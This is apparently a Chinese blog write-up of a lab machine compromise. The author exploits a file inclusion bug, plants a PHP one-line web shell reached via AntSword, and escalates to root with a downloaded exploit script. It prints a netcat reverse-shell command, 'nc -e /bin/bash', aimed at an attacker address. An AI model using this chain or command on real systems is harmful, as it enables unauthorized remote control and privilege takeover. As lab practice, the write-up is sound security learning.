信息收集
只开了80,111
111在之前查过,没啥有用的,直接访问网站。
网页
很简单的网站,只有这一个地方能提交

扫目录,挨个访问一下,有一个奇怪的页面/footer.php,看着只是一个简单的标签,但是不知道为什么你一直刷新它的那个值一直变化,2017,2018,2019 

我出了一个问题一直卡着,想了半天才看见,提交php代码时,在它的网页格子内提交没用,只能在数据包内改请求头

然后按照上面的方法放入一句话木马,蚁剑连接

nc -e /bin/bash 192.168.83.128 4444
反弹到kali
提权
看有什么suid提权,系统版本有什么漏洞。
本来还没看出来什么,看别人写的,这东西这么难注意。。。。

下来search exploit ,然后将exp直接通过蚁剑上传,执行之后就是root权限
没执行权限就
chmod +x 41154.sh

总结
这个靶机还是考察的最基础的文件包含漏洞和nginx的任意文件解析漏洞,基础还是要扎实一点,提权那块我是真没想到那个东西,以后遇见陌生的就搜一搜
文章描述了一次针对简单网站的安全测试过程,通过文件包含漏洞发现了一个可变值的/footer.php页面,利用PHP代码注入并借助蚁剑工具进行反弹shell。在提权阶段,通过searchexploit寻找漏洞利用,并成功获取root权限,强调了基础安全知识的重要性。
446

被折叠的 条评论
为什么被折叠?



